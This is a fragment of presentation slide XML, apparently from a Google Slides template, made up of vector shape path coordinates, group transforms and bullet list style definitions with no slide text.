                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="6412200" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">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7" name="Google Shape;37;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1200975"/>
            <a:ext cx="7704000" cy="3326100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Livvic"/>
              <a:buChar char="●"/>
              <a:defRPr sz="12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1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="434343"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-344350" y="4817800"/>
            <a:ext cx="2758303" cy="193976"/>
            <a:chOff x="-344350" y="4817800"/>
            <a:chExt cx="2758303" cy="193976"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Google Shape;39;p4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1676492" y="4830170"/>
              <a:ext cx="92660" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1880" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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1993939" y="4830170"/>
              <a:ext cx="91428" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1855" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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2299014" y="4817800"/>
              <a:ext cx="114938" cy="114927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2332" h="2332" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1880" y="477"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="477"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="1"/>
                    <a:pt x="1" y="126"/>
                    <a:pt x="1" y="251"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2231"/>
                    <a:pt x="101" y="2331"/>
                    <a:pt x="226" y="2331"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2106" y="2331"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2231" y="2331"/>
                    <a:pt x="2332" y="2231"/>
                    <a:pt x="2332" y="2106"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2332" y="251"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2332" y="126"/>
                    <a:pt x="2231" y="1"/>
                    <a:pt x="2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a:off x="-344350" y="4864717"/>
              <a:ext cx="2033307" cy="147059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41254" h="2984" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="31229" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31179" y="1"/>
                    <a:pt x="31103" y="26"/>
                    <a:pt x="31078" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28622" y="2507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="2507"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="2507"/>
                    <a:pt x="0" y="2633"/>
                    <a:pt x="0" y="2758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2883"/>
                    <a:pt x="101" y="2983"/>
                    <a:pt x="226" y="2983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28722" y="2983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28772" y="2983"/>
                    <a:pt x="28848" y="2958"/>
                    <a:pt x="28898" y="2908"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31329" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41028" y="477"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41154" y="477"/>
                    <a:pt x="41254" y="352"/>
                    <a:pt x="41254" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41254" y="101"/>
                    <a:pt x="41154" y="1"/>
                    <a:pt x="41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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="1489568" y="3113925"/>
            <a:ext cx="643914" cy="3623066"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="643914" cy="3623066"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Google Shape;45;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="201918" y="63821"/>
              <a:ext cx="72619" cy="101243"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4011" h="5592" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3663" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3555" y="1"/>
                    <a:pt x="3449" y="56"/>
                    <a:pt x="3384" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5090"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5241"/>
                    <a:pt x="26" y="5441"/>
                    <a:pt x="176" y="5542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="5567"/>
                    <a:pt x="276" y="5592"/>
                    <a:pt x="351" y="5592"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="5592"/>
                    <a:pt x="552" y="5542"/>
                    <a:pt x="602" y="5441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3910" y="504"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4011" y="354"/>
                    <a:pt x="3960" y="153"/>
                    <a:pt x="3835" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3782" y="17"/>
                    <a:pt x="3722" y="1"/>
                    <a:pt x="3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216376" y="14672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a:off x="111628" y="3180578"/>
              <a:ext cx="60362" cy="108177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3334" h="5975" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2984" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="1"/>
                    <a:pt x="2759" y="57"/>
                    <a:pt x="2707" y="160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="5524"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5674"/>
                    <a:pt x="75" y="5850"/>
                    <a:pt x="226" y="5925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="5950"/>
                    <a:pt x="326" y="5975"/>
                    <a:pt x="351" y="5975"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="5975"/>
                    <a:pt x="577" y="5900"/>
                    <a:pt x="652" y="5800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3258" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3333" y="286"/>
                    <a:pt x="3283" y="110"/>
                    <a:pt x="3133" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3086" y="12"/>
                    <a:pt x="3035" y="1"/>
                    <a:pt x="29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a:off x="370258" y="4858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a:off x="88472" y="25155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376818" y="3564044"/>
              <a:ext cx="59004" cy="59022"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3259" h="3260" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1629" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2180" y="627"/>
                    <a:pt x="2632" y="1079"/>
                    <a:pt x="2632" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2632" y="2181"/>
                    <a:pt x="2180" y="2632"/>
                    <a:pt x="1629" y="2632"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1078" y="2632"/>
                    <a:pt x="627" y="2181"/>
                    <a:pt x="627" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1079"/>
                    <a:pt x="1078" y="627"/>
                    <a:pt x="1629" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1629" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="1"/>
                    <a:pt x="0" y="728"/>
                    <a:pt x="0" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2532"/>
                    <a:pt x="727" y="3259"/>
                    <a:pt x="1629" y="3259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2531" y="3259"/>
                    <a:pt x="3258" y="2532"/>
                    <a:pt x="3258" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3258" y="728"/>
                    <a:pt x="2531"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a:off x="196921" y="2238919"/>
              <a:ext cx="22722" cy="22975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1269" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="26" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="943"/>
                    <a:pt x="176" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="627" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1269"/>
                    <a:pt x="953" y="1194"/>
                    <a:pt x="1054" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="943"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1254" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1154" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1129" y="241"/>
                    <a:pt x="1104" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1028" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="978" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="753" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="5"/>
                    <a:pt x="668" y="0"/>
                    <a:pt x="6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a:off x="603052" y="0"/>
              <a:ext cx="22704" cy="22595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1248" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="614" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="0"/>
                    <a:pt x="288" y="57"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="194"/>
                    <a:pt x="125" y="219"/>
                    <a:pt x="100" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="295"/>
                    <a:pt x="50" y="320"/>
                    <a:pt x="50" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="395"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="520"/>
                    <a:pt x="0" y="570"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="50" y="946"/>
                    <a:pt x="176" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="451" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="952" y="1172"/>
                    <a:pt x="1053" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1253" y="771"/>
                    <a:pt x="1253" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="570"/>
                    <a:pt x="1228" y="520"/>
                    <a:pt x="1228" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1228" y="445"/>
                    <a:pt x="1203" y="395"/>
                    <a:pt x="1203" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="320"/>
                    <a:pt x="1153" y="295"/>
                    <a:pt x="1128" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="219"/>
                    <a:pt x="1078" y="194"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="57"/>
                    <a:pt x="777"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7" y="1029179"/>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570446" y="9701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584884" y="20180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507951" y="28901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57;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6675935" y="1128258"/>
            <a:ext cx="2468054" cy="4015243"/>
            <a:chOff x="6675935" y="1128258"/>
            <a:chExt cx="2468054" cy="4015243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Google Shape;58;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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7217003" y="4758278"/>
              <a:ext cx="97115" cy="78159"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5364" h="4317" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="341" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="1"/>
                    <a:pt x="157" y="46"/>
                    <a:pt x="100" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="256"/>
                    <a:pt x="25" y="457"/>
                    <a:pt x="151" y="557"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4812" y="4266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4887" y="4317"/>
                    <a:pt x="4938" y="4317"/>
                    <a:pt x="5013" y="4317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5113" y="4317"/>
                    <a:pt x="5213" y="4292"/>
                    <a:pt x="5263" y="4216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5364" y="4066"/>
                    <a:pt x="5339" y="3865"/>
                    <a:pt x="5213" y="3765"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="552" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="27"/>
                    <a:pt x="412" y="1"/>
                    <a:pt x="3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a:off x="8955190" y="4621461"/>
              <a:ext cx="36789" cy="116379"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2032" h="6428" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="347" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="0"/>
                    <a:pt x="300" y="4"/>
                    <a:pt x="277" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="62"/>
                    <a:pt x="1" y="212"/>
                    <a:pt x="26" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1379" y="6202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="6327"/>
